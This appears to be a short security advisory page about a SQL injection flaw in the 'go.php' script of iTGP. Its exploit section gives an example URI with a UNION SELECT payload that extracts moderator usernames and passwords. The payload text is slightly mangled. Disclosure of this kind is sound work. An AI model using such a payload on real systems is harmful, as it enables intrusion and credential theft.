iTGP 'go.php' SQL Injection Vulnerability

info
discussion
exploit
solution
references

iTGP 'go.php' SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example URI is available:

http://www.example.com/go.php?action=report&id= Real id here +UNION+SELECT+010,CONCAT_ES(0x3a,username,password)MrSQL+FROM+itgp_moderator+limit+1,1--